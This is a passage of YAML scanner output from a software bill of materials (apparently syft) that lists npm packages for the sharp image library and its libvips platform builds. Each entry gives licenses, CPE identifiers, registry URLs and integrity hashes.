path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-libvips-linux-ppc64 1.2.4'
title: '@img/sharp-libvips-linux-ppc64 1.2.4'
description: 'Package discovered: @img/sharp-libvips-linux-ppc64 1.2.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0a49b35ad8071788
name: '@img/sharp-libvips-linux-ppc64'
version: 1.2.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: LGPL-3.0-or-later
spdxExpression: LGPL-3.0-or-later
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-ppc64:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-ppc64:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_ppc64:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_ppc64:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-libvips-linux-ppc64@1.2.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-ppc64/-/sharp-libvips-linux-ppc64-1.2.4.tgz
integrity: sha512-FMuvGijLDYG6lW+b/UvyilUWu5Ayu+3r2d1S8notiGCIyYU/76eig1UfMmkZ7vwgOrzKzlQbFSuQfgm7GYUPpA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2eef65dffbde81a3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-libvips-linux-riscv64 1.2.4'
title: '@img/sharp-libvips-linux-riscv64 1.2.4'
description: 'Package discovered: @img/sharp-libvips-linux-riscv64 1.2.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 69aa9726ceb1125a
name: '@img/sharp-libvips-linux-riscv64'
version: 1.2.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: LGPL-3.0-or-later
spdxExpression: LGPL-3.0-or-later
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-riscv64:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-riscv64:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_riscv64:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_riscv64:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-libvips-linux-riscv64@1.2.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-riscv64/-/sharp-libvips-linux-riscv64-1.2.4.tgz
integrity: sha512-oVDbcR4zUC0ce82teubSm+x6ETixtKZBh/qbREIOcI3cULzDyb18Sr/Wcyx7NRQeQzOiHTNbZFF1UwPS2scyGA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 48c4bc7216358207
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-libvips-linux-s390x 1.2.4'
title: '@img/sharp-libvips-linux-s390x 1.2.4'
description: 'Package discovered: @img/sharp-libvips-linux-s390x 1.2.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b12e72c485584ae0
name: '@img/sharp-libvips-linux-s390x'
version: 1.2.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: LGPL-3.0-or-later
spdxExpression: LGPL-3.0-or-later
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-s390x:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-s390x:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_s390x:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_s390x:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-libvips-linux-s390x@1.2.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-s390x/-/sharp-libvips-linux-s390x-1.2.4.tgz
integrity: sha512-qmp9VrzgPgMoGZyPvrQHqk02uyjA0/QrTO26Tqk6l4ZV0MPWIW6LTkqOIov+J1yEu7MbFQaDpwdwJKhbJvuRxQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 79972044480a2381
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-libvips-linux-x64 1.2.4'
title: '@img/sharp-libvips-linux-x64 1.2.4'
description: 'Package discovered: @img/sharp-libvips-linux-x64 1.2.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a57b531e02329e6d
name: '@img/sharp-libvips-linux-x64'
version: 1.2.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: LGPL-3.0-or-later
spdxExpression: LGPL-3.0-or-later
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-x64:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-x64:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_x64:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_x64:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-libvips-linux-x64@1.2.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-x64/-/sharp-libvips-linux-x64-1.2.4.tgz
integrity: sha512-tJxiiLsmHc9Ax1bz3oaOYBURTXGIRDODBqhveVHonrHJ9/+k89qbLl0bcJns+e4t4rvaNBxaEZsFtSfAdquPrw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7de94e70bc6a1409
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-libvips-linuxmusl-arm64 1.2.4'
title: '@img/sharp-libvips-linuxmusl-arm64 1.2.4'
description: 'Package discovered: @img/sharp-libvips-linuxmusl-arm64 1.2.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 67f7722888e07f97
name: '@img/sharp-libvips-linuxmusl-arm64'
version: 1.2.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: LGPL-3.0-or-later
spdxExpression: LGPL-3.0-or-later
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl-arm64:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl-arm64:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl_arm64:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl_arm64:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-libvips-linuxmusl-arm64@1.2.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-libvips-linuxmusl-arm64/-/sharp-libvips-linuxmusl-arm64-1.2.4.tgz
integrity: sha512-FVQHuwx1IIuNow9QAbYUzJ+En8KcVm9Lk5+uGUQJHaZmMECZmOlix9HnH7n1TRkXMS0pGxIJokIVB9SuqZGGXw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c540ef9b43418974
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-libvips-linuxmusl-x64 1.2.4'
title: '@img/sharp-libvips-linuxmusl-x64 1.2.4'
description: 'Package discovered: @img/sharp-libvips-linuxmusl-x64 1.2.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 61da63d4bf468c4d
name: '@img/sharp-libvips-linuxmusl-x64'
version: 1.2.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: LGPL-3.0-or-later
spdxExpression: LGPL-3.0-or-later
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl-x64:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl-x64:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl_x64:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl_x64:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-libvips-linuxmusl-x64@1.2.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-libvips-linuxmusl-x64/-/sharp-libvips-linuxmusl-x64-1.2.4.tgz
integrity: sha512-+LpyBk7L44ZIXwz/VYfglaX/okxezESc6UxDSoyo2Ks6Jxc4Y7sGjpgU9s4PMgqgjj1gZCylTieNamqA1MF7Dg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9ac46491201655bd
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-linux-arm 0.34.5'
title: '@img/sharp-linux-arm 0.34.5'
description: 'Package discovered: @img/sharp-linux-arm 0.34.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: dcf7df343a75d233
name: '@img/sharp-linux-arm'
version: 0.34.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-linux-arm:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux-arm:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux_arm:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux_arm:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-linux-arm@0.34.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-linux-arm/-/sharp-linux-arm-0.34.5.tgz
integrity: sha512-9dLqsvwtg1uuXBGZKsxem9595+ujv0sJ6Vi8wcTANSFpwV/GONat5eCkzQo/1O6zRIkh0m/8+5BjrRr7jDUSZw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f3729e97d1846b60
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-linux-arm64 0.34.5'
title: '@img/sharp-linux-arm64 0.34.5'
description: 'Package discovered: @img/sharp-linux-arm64 0.34.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: fd64c295f8bc0b6a
name: '@img/sharp-linux-arm64'
version: 0.34.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-linux-arm64:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux-arm64:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux_arm64:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux_arm64:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-linux-arm64@0.34.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-linux-arm64/-/sharp-linux-arm64-0.34.5.tgz
integrity: sha512-bKQzaJRY/bkPOXyKx5EVup7qkaojECG6NLYswgktOZjaXecSAeCWiZwwiFf3/Y+O1HrauiE3FVsGxFg8c24rZg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7108a685f3138a28
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-linux-ppc64 0.34.5'
title: '@img/sharp-linux-ppc64 0.34.5'
description: 'Package discovered: @img/sharp-linux-ppc64 0.34.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3b1510e0e0b839b3
name: '@img/sharp-linux-ppc64'
version: 0.34.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
